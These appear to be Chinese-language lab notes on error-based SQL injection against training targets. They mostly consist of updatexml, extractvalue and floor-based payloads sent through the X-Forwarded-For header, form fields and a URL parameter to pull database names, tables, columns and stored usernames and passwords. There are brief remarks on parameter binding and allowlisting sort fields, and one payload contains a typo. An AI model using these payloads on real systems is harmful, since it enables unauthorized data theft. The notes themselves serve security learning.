进行 SQL 注入测试时,很多注入点并不会直接回显查询结果,原因往往在于后端 SQL 语句本身的查询方式(例如 insert、delete、update 这类不返回数据的语句)。此时需要借助报错注入或盲注来继续验证;手工测试时,提前推测后端 SQL 语句的大致写法,也有助于选择合适的测试语句。
基于报错的 SQL 盲注-报错回显
floor,updatexml,extractvalue
X-Forwarded-For、Host 等 HTTP 请求头同样可能成为注入点:只要服务端把请求头的值未经参数化地拼接进 SQL 语句,它们就和普通请求参数一样属于不可信输入,必须同等处理。
靶场:墨者 X-Forwarded-For 注入
获取当前连接所使用的数据库用户(user())
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select user()) ,0x7e),1)
获取当前使用的数据库名(database())
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select database()) ,0x7e),1)
获取第一个表名
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='webcalendar' limit 0,1),0x7e),1)
获取第二个表名
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='webcalendar' limit 1,1),0x7e),1)
获取第一个字段
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='webcalendar' and table_name='user' limit 0,1),0x7e),1)
获取第二个字段
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='webcalendar' and table_name='user' limit 1,1),0x7e),1)
获取第三个字段
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='webcalendar' and table_name='user' limit 2,1),0x7e),1)
获取字段内容
X-Forwarded-For:127.0.0.1', updatexml(1,concat(0x7e,(select concat(username,password) from user limit 0,1) ,0x7e),1)
select 查询数据
网站中用于数据展示的查询操作。$id 若被直接拼接进语句而非作为绑定参数传入,即构成注入点;正确做法是使用占位符绑定该值。
select * from news where id = $id
insert 插入数据
网站中用户注册、新增记录等写入操作。此类语句不会回显查询结果,因此注入通常只能通过报错注入或盲注来确认。
insert into news(id,url,text) values (2,'x','$t')
delete 删除数据
后台管理中删除文章、删除用户等操作,同样不回显数据。
delete from news where id=$id
update 更新数据
会员中心或后台中的数据同步、缓存更新等操作,同样不回显数据。
update user set pwd='$p' where id=2 and username='admin'
order by 排序数据
通常按表名或列名进行排序。排序字段是标识符而非值,无法用占位符绑定,因此服务端应对 $id、$order 这类排序参数做固定白名单校验,而不是直接拼接。
select * from news order by $id
select id,name,price from news order by $order
username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '
&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or updatexml(1,concat(0x7e,(version())),0) or
'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or extractvalue(1,concat(0x7e,database())) or
'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select
count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or
updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit
/pikachu/vul/sqli/sqli_del.php?id=56+or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)
pikachu/vul/sqli/sqli_del.php?id=56+or+updatexml+(1,concat(0x7e,database()),0)
/pikachu/vul/sqli/sqli_del.php?id=56+or+extractvalue(1,concat(0x7e,database()))